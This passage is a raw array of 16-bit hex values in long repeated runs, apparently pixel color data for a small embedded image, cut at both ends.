0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0xe8e4, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 